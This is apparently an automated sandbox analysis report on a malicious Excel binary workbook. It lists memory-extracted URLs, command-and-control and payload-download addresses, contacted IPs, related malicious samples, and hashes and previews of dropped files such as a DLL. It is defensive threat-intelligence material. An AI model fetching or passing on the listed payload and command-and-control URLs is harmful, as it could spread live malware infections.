http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | false | | high
https://api.aadrm.com/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x4) | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | false | | high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://api.microsoftstream.com/api/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://cr.office.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://portal.office.com/account/?ref=ClientMeControl | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000025.00000002.587720869.0000028658461000.00000004.00000001.sdmp, powershell.exe, 00000027.00000002.589665519.000002B5AD541000.00000004.00000001.sdmp | false | | high
http://www.reddit.com/ | msapplication.xml4.23.dr | false | | high
http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/ | regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://graph.ppe.windows.net | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://powerlift-frontdesk.acompli.net | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://tasks.office.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://officeci.azurewebsites.net/api/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | false | | high
https://free.mynowministries.com/app.dll | close.xml | false | Avira URL Cloud: safe | unknown
http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx | {7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr | true | Avira URL Cloud: safe | unknown
https://store.office.cn/addinstemplate | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp | false | | high
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://globaldisco.crm.dynamics.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare | regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://store.officeppe.com/addinstemplate | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://dev0-api.acompli.net/autodetect | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://www.odwebp.svc.ms | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://api.powerbi.com/v1.0/myorg/groups | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://web.microsoftstream.com/video/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://graph.windows.net | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://dataservice.o365filtering.com/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://github.com/Pester/Pester | powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp | false | | high
https://officesetup.getmicrosoftkey.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://analysis.windows.net/powerbi/api | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
http://www.youtube.com/ | msapplication.xml7.23.dr | false | | high
https://ncus.contentsync. | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
http://weather.service.msn.com/data.aspx | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://apis.live.net/v5.0/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://management.azure.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://wus2.contentsync. | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x3) | unknown
https://incidents.diagnostics.office.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://clients.config.office.net/user/v1.0/ios | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://insertmedia.bing.office.net/odc/insertmedia | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://o365auditrealtimeingestion.manage.office.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://outlook.office365.com/api/v1.0/me/Activities | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://api.office.net | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://incidents.diagnosticssdf.office.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
http://www.amazon.com/ | msapplication.xml.23.dr | false | | high
https://entitlement.diagnostics.office.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | |
                                                                                                                                                      high
                                                                                                                                                      http://www.twitter.com/msapplication.xml5.23.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://substrate.office.com/search/api/v2/init3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                                                                                                                                            high

Contacted IPs


Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 162.241.253.78 | free.mynowministries.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
| 165.232.183.49 | gtr.antoinfer.com | United States | 22255 | ALLEGHENYHEALTHNETWORKUS | true |

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 445916
Start date: 08.07.2021
Start time: 15:44:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 50s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: documentation_39236.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 49
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSB@31/52@7/2
EGA Information:
• Successful, ratio: 50%
HDC Information:
• Successful, ratio: 88% (good quality ratio 83.6%)
• Quality average: 79.8%
• Quality standard deviation: 29.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Max analysis timeout: 220s exceeded, the analysis took too long
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 104.43.193.48, 52.109.76.68, 52.109.8.25, 52.109.8.23, 20.82.209.183, 92.122.144.200, 40.112.88.60, 23.55.110.38, 23.55.110.6, 51.103.5.186, 20.50.102.62, 95.101.22.216, 95.101.22.224, 2.18.105.186, 152.199.19.161, 20.72.88.19
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
• Execution Graph export aborted for target mshta.exe, PID 3128 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 5780 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 15:46:12 | API Interceptor | 1x Sleep call for process: regsvr32.exe modified |
| 15:47:49 | API Interceptor | 45x Sleep call for process: powershell.exe modified |

Joe Sandbox View / Context

IPs

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| 165.232.183.49 | 3a94.dll | malicious | gtr.antoinfer.com/favicon.ico |
| | 3b17.dll | malicious | gtr.antoinfer.com/favicon.ico |
| | 9b9dc.dll | malicious | gtr.antoinfer.com/favicon.ico |

Domains

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| gtr.antoinfer.com | 3a94.dll | malicious | 165.232.183.49 |
| | 3b17.dll | malicious | 165.232.183.49 |
| | 9b9dc.dll | malicious | 165.232.183.49 |

ASN

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| UNIFIEDLAYER-AS-1US | Baimex srl Enquiry.xlsx | malicious | 162.241.75.144 |
| | P.O 09483938.doc | malicious | 192.185.24.91 |
| | NWMEaRqF7s.exe | malicious | 162.241.242.173 |
| | audit-1007245983.xlsb | malicious | 162.144.229.210 |
| | SecuriteInfo.com.Trojan.Win32.Save.a.21204.exe | malicious | 192.185.24.91 |
| | INVOICE_070621_PDF.exe | malicious | 192.185.164.148 |
| | Invoice_7734.exe | malicious | 192.185.164.148 |
| | Rq0Y7HegCd.exe | malicious | 162.241.62.54 |
| | Banco Santander Copia de pago.doc | malicious | 162.144.79.7 |
| | PO_0187.exe | malicious | 162.241.218.79 |
| | SecuriteInfo.com.TrojanSpy.MSIL.AgentTesla.ee9ddc65.25172.exe | malicious | 192.185.164.148 |
| | SWIFT Ref No TT 00189330982 pdf.exe | malicious | 192.185.171.219 |
| | Invoice_1980.exe | malicious | 192.185.164.148 |
| | Ordine 6809 020621.exe | malicious | 108.167.141.137 |
| | Gift Card 0796907.xlsb | malicious | 162.144.57.183 |
| | Gift Card 0796907.xlsb | malicious | 162.144.57.183 |
| | Gift Card 0796907.xlsb | malicious | 162.144.57.183 |
| | Gift 7333663.xlsb | malicious | 162.241.96.85 |
| | vv.xlsb | malicious | 162.214.186.5 |
| | vv.xlsb | malicious | 162.214.186.5 |
| ALLEGHENYHEALTHNETWORKUS | grezVgW6gx.exe | malicious | 165.232.181.86 |
| | rixXmiPteY.exe | malicious | 165.232.181.86 |
| | ibj3mCisBP.exe | malicious | 165.232.181.86 |
| | 3a94.dll | malicious | 165.232.183.49 |
| | 3b17.dll | malicious | 165.232.183.49 |
| | 9b9dc.dll | malicious | 165.232.183.49 |
| | sMpor4yDdu.exe | malicious | 165.232.177.150 |
| | WesYhOA67u.exe | malicious | |
                                                                                                                                                            • 165.232.177.148
                                                                                                                                                            06LzL8skNz.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.193
                                                                                                                                                            Jt8zMQzDO2.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.193
                                                                                                                                                            WCPcSoW6ZI.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.184.56
                                                                                                                                                            VD4V1nD2qq.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.184.56
                                                                                                                                                            PDFXCview.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.56.100
                                                                                                                                                            Quote.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.56.241
                                                                                                                                                            SyfoFC5d21.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.110.48
                                                                                                                                                            RNM56670112.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.36.60
                                                                                                                                                            RRUY44091239.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.36.60
                                                                                                                                                            http://165.232.53.33/chrgoo/index.htmlGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.53.33
                                                                                                                                                            exploit.docGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.122.138
                                                                                                                                                            Information_1598546901.docGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.71.161

JA3 Fingerprints

Match                              Associated Sample Name / URL        Detection    Context
37f463bf4616ecd445d4a1937da06e19   TFfv4hD2jx.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   8L621QxNHv.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   fG9WW97ssF.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   DHL_PACKAGE_HD98232.pdf.exe         malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   Satinalma Siparisi Listesi.exe      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   po4rKwQaet.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   BcpljzRiWJ.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   Mh2FzBrd3m.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   nanomalware.doc                     malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   bDemJQO51z.xlsb                     malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   Ih5baTrZim.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   Cmh_Fax-Message-3865.html           malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   Jhy2YPMShA.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   Copie de plata bancara.exe          malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   Copie de plata bancara.exe          malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   FAX.HTML                            malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   3MIvJieGXT.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   audit-1007245983.xlsb               malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   ztr3AvK8Oq.exe                      malicious    • 162.241.253.78
37f463bf4616ecd445d4a1937da06e19   tCgQxi2KmS.exe                      malicious    • 162.241.253.78

Dropped Files

No context

Created / dropped Files

C:\Users\Public\Documents\decrypt.dll
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 455680
Entropy (8bit): 6.751938575699122
Encrypted: false
SSDEEP: 12288:AmYDWUbdfyU+H93bJ3aBGQIuSR35F5VBpx:yBbdfJsJqBG5VB/
MD5: F3BE390B01C85970DEEAE124CA36CE2D
SHA1: 93114ECF1B2C711EC10E1FAFDC834393EFC11A97
SHA-256: 4EEF8B6A5BCD808CD0AB0E33EFCEA2C2F9A36ABE556E56556DE8550383C9D3CE
SHA-512: 463829E0A07A2983D967483D49DD478243658C0BE583BCDDB801CD45BEB869EEE8CDA812EA3A74E5CF5D70BE07B5A59677317DBADCEFDB8A21DE3DDCBE7FA3A6
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S....z.X.z.X.z.XL..Y.z.XL..Y.z.XL..Y.z.X...Y.z.X...Y.z.X...Y6z.X..kX.z.X.z.Xcz.X...Y.z.X...Y.z.X...Y.z.XRich.z.X................PE..L......^...........!................7.....................................................@.................................@................................p...#......T........................... ...@............................................text............................... ..`.rdata..p...........................@..@.data...............................@....reloc...#...p...$..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5DCD6FF6-E03E-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 29272
Entropy (8bit): 1.7715078128206818
Encrypted: false
SSDEEP: 48:Iw+Gcpr7GwpLN8G/ap8NYGIpcN8UGvnZpvN8WGo6qp9N8hGo4NpmN8gGWwAQGWaj:riZVZN+2N4WN8dtN84fN8SNMN8tUNrjB
MD5: AAFD082475A3FA2768778183CEE2850E
SHA1: F6608B80EAF7233A50DDF1375EAE827300F5E0A0
SHA-256: D114B9D0DA99FE585A9C15EF071D74FF7DBC739819CB702371A53C100CB3220A
SHA-512: 9A48AC75962D7FB09926080A8757036B0BBD47D915ED41DE9825C6D9A628A5FB45E342575EDCD41C4FBC39612C888E36DAB32F1ED2E4C63E3E7082FA117A976B
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7879BAA2-E03E-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 120168
Entropy (8bit): 2.2535850030479416
Encrypted: false
SSDEEP: 384:rgHHJMv0eUkzYfIf3pVsllhb75NLcCs6EVMLTATOz:ZvzElZro+
MD5: AF5C812B4D9A09EEBEEFBE547FCD3844
SHA1: DB30A7DF7E8CBA0F3635E06DE6575C695B10AB0F
SHA-256: E59951BB01F1D2DBB55BDE471FA7CCB363E9879EDB5032AA7E3588D92205FA7E
SHA-512: F4F2E4EADB40BE3719373C0E3A88FB0B620234AF9325036472D4C282D586187CFCF82FAFF5EEBF53AD59DE16170546F116799C231D4B1273525A59B947503E84
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 28148
Entropy (8bit): 1.9172894757577383
Encrypted: false
SSDEEP: 192:rCZdQV6PkVjB2JWVaMlFepzz6cd1eOpzz6kA:r+iAMxw45TOrHJS
MD5: ED54374423511A130B6C7F70E51634B8
SHA1: 2744C26F931D20C425AA2CDA96362DB72C2D8EE4
SHA-256: 4293409833513E385CCD6D9E7BC421C645062643EFB9ED25E6C4D1D18E1472FA
SHA-512: 76639BE112CC0C0E55C7763F137883227D129DB3631901B88A8DAB75DD958FDBDD5D000FDDA50A406B655C5B6D6118CDD39B599AE851D0DF888F027DCBF5C2B0
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 28148
Entropy (8bit): 1.9207864501007292
Encrypted: false
SSDEEP: 96:rUZ7Qr6jBSDjZ2EW5MBFrdTY5dd1r/dTY5lA:rUZ7Qr6jkDjZ2EW5MBFNMdd1VMlA
MD5: A3A2174E4BEEBF9ACEE6A917DFE58C7C
SHA1: 33FFE8E193DF001EF984C47A144148A31DCED4CF
SHA-256: 6DA57020DEAE2361A87E28B29714047D5ED384E468F9E682D11F81A986B47ECF
SHA-512: 68E0DAF1E5093E96248B1B570ADB9A8460B3B7CE2C4CB872127FA7212AA04850D54C959FB756C98EC807E07C4B6D875A05C77887E5414FD09209A3F3B962BD25
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28156
                                                                                                                                                            Entropy (8bit):1.9208052079408886
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:riZtQh6DkejR2WWcMIdiUmCIiJuliUmeUmCIiJNA:rey8IYANZE3Oi830Oic
                                                                                                                                                            MD5:0B513216BE62CF04377BFB78AF2FB033
                                                                                                                                                            SHA1:7DDC0EFE169655A8E42042F16B358E4640501542
                                                                                                                                                            SHA-256:901141D666CB5B0447B943A481610CC7D569368363784115138EB19808071358
                                                                                                                                                            SHA-512:BAB081FBC6FBADCF929D9C25872DCA16BC7988D03CC0CA9224C0D95CE3D2198EF4281BC9451CCA33AF1F4D4F0D6FA13AA8717317F7DC8E7578687F9958A0EF66
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28144
                                                                                                                                                            Entropy (8bit):1.9196947220972707
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:riZyQW6wBSrjF2dWWMCZ59Fut1S1599x9Fut0A:riZyQW6wkrjF2dWWMCZ5Wy15pWSA
                                                                                                                                                            MD5:7E9E57AAF045A952E0B0559FCAF26878
                                                                                                                                                            SHA1:2C0449F865C5EFD6124F87884CECBC5B03B0AB3C
                                                                                                                                                            SHA-256:63F65CED138E3DC528136010881E304108EDAA83A9D1AC22796ED9EA9E371054
                                                                                                                                                            SHA-512:0858D0B9638B8FBC0B712E76DA0FC7C25D18F4703F76B1C59963A128F81A736C7749F975DD74C0B08E7E23D19B7DF3A7E8363946C8E6C37AA783CEF3DC64D211
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAAA-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28148
                                                                                                                                                            Entropy (8bit):1.9192988666458124
                                                                                                                                                            Encrypted:false
